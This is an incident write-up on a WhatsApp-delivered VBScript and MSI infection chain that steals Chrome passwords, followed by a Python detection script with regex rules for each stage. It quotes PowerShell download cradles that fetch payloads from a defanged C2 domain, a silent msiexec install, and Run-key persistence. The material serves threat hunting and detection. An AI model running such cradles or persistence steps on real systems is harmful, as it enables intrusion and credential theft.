While hunting for suspicious PowerShell commands and scripting interpreter activity, we identified evidence of multi-stage malicious execution involving VBS and PowerShell download cradles, MSI installation, and credential-stealing behavior.
Initial Access & Delivery Chain Summary
- Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
- Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
  - Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
  - Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
  - Created persistence by adding the installer script to the Run registry key.
  - Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
  - Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.
Observed Malicious Execution Activity
WScript Executions
- "wscript.exe" C:\Users\*\AppData\Local\Temp\baixa_sscado.vbs
- "WScript.exe" C:\Users\*\AppData\Local\Temp\*\*.zip.0e6*.vbs
- "wscript.exe" C:\Users\*\AppData\Local\Temp\installer.vbs
PowerShell Download Activity
- "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
- "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
- "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"
Msiexec Execution
- "msiexec.exe" /i C:\Users\*\AppData\Local\Temp\installer.msi /quiet /norestart
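As an added example (not part of this write-up), a small Python rule set that flags each stage of the chain above in process-creation command lines and reports whether the full wscript, PowerShell cradle and silent msiexec sequence is present. The sample command lines are constructed for the example and reuse the write-up's defanged indicators.

```python
import re
from typing import Dict, List

# Each rule is a case-insensitive regex over one process-creation command line,
# matching one stage of the observed chain: a script host launching a .vbs from
# %TEMP%, a PowerShell download cradle writing to $env:TEMP with the execution
# policy bypassed, and a silent msiexec install of an .msi dropped in %TEMP%.
RULES: Dict[str, re.Pattern] = {
    "wscript_vbs_from_temp": re.compile(
        r'(?:^|\\|")wscript\.exe"?\s+.*\\appdata\\local\\temp\\.*\.vbs\b', re.I),
    "powershell_download_cradle": re.compile(
        r'powershell(?:\.exe)?"?.*-e(?:p|xecutionpolicy)\s+bypass.*'
        r'invoke-webrequest.*-outfile\s+\$env:temp\\', re.I),
    "msiexec_quiet_from_temp": re.compile(
        r'msiexec(?:\.exe)?"?\s+.*/i\s+.*\\appdata\\local\\temp\\.*\.msi\b.*/quiet', re.I),
}

# Constructed sample command lines (not real telemetry). The first three mirror
# the chain in the write-up; the last two are benign controls that must not fire.
SAMPLE_CMDLINES: List[str] = [
    r'"wscript.exe" C:\Users\alice\AppData\Local\Temp\baixa_sscado.vbs',
    r'''"powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"''',
    r'"msiexec.exe" /i C:\Users\alice\AppData\Local\Temp\installer.msi /quiet /norestart',
    r'"wscript.exe" C:\Scripts\logon.vbs',
    r'"powershell.exe" -NoProfile -c "Get-Process"',
]


def match_rules(cmdline: str) -> List[str]:
    """Return the names of every rule the command line triggers."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def hunt(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each triggered rule name to the command lines that fired it."""
    hits: Dict[str, List[str]] = {}
    for line in cmdlines:
        for name in match_rules(line):
            hits.setdefault(name, []).append(line)
    return hits


def chain_observed(hits: Dict[str, List[str]]) -> bool:
    """True when every stage fired, i.e. the whole delivery chain is present."""
    return set(RULES) <= set(hits)


if __name__ == "__main__":
    results = hunt(SAMPLE_CMDLINES)
    for rule, lines in results.items():
        print(f"[{rule}] {len(lines)} hit(s)")
    print("full chain observed:", chain_observed(results))
```

Each rule on its own is a weak signal (a single quiet MSI install from %TEMP% is common); the value is in correlating all three on one host within a short window.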